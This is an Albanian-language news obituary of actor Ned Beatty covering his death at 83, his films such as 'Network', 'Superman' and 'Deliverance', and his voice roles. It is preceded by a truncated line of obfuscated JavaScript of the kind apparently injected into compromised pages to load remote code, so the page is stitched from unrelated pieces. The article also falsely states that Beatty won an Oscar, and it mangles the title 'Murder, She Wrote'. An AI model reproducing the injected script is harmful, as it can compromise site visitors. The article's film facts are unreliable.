;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ylli i “Superman” ndahet nga jeta

By

Aktori amerikan Ned Thomas Beatty, i njohur për rolin e tij në filmin “Superman”, vdiç të dielën, në gjumë në moshën 83 vjeçare.

Vdekja u konfirmua nga një anëtar i familjes, i cili tha se ai vdiç, ndërsa ishte i rrethuar nga familja e tij.

Asnjë detaj i mëtejshëm rreth vdekjes nuk ishte në dispozicion menjëherë, por gazeta amerikane “TMZ”  tha se vdekja nuk ishte e lidhur me COVID-19.

Beatty, ishte një legjendë në ekran, karriera e tij në botën filmike zgjati pesë dekada, e cila filloi në vitin 1972, ishte një prej aktorëve më të mëdhenj i cili luajti në më shumë se 160 filma, ai ishte i njohur për gamën e gjerë të aftësive të tij.

Në filmin e tij të vitit 1976 “Network”, Beatty dha një monolog mahnitës të gjatë pesë deri në gjashtë minuta, ku ai përpiqet të bindë protagonistin të pranojë një marrëveshje të madhe bashkimi që nuk do të ishte e mirë për publikun.

Në vitin 1978, u nominua për çmimin “Best Supporting Actor”, në nominimet Oscars, dhe u shpall fitues, po atë vit i mahniti fansat përsëri  kur luajti një karakter krejtësisht të ndryshëm në “Superman”.

Beatty, i dëshmoi Hollywood-it se mund të luante personazhe komike po aq mirë, sa mund të luante edhe personazhe seriozë, dhe vazhdoi rolin e tij gjatë vazhdimit të “Superman II” në  vitin 1980.

Në debutimin e tij në ekran në vitin 1972, Beatty luajti në një thriller psikologjik “Deliverance”, dhe ishte viktima në ekran në skenën famëkeqe të përdhunimit “Squeal like a pig” që do të hynte në historinë e filmit si një nga momentet më të shthurura që ndonjëherë goditi arka e filmit.

Në moshën e tij më të vjetër, Beatty mori një numër rolesh të zërit në “Rango” dhe  në “Toy Story 3”, gjithashtu u shfaq në seri të mëdha televizive si, “MASH”, “CSI”, “Murder”, dhe  “She Wrote”.

Aktori ka lënë pas gruan e tij, Sandra Johnson, tetë fëmijë dhe nipër e mbesa.

Artikuj të ngjashëm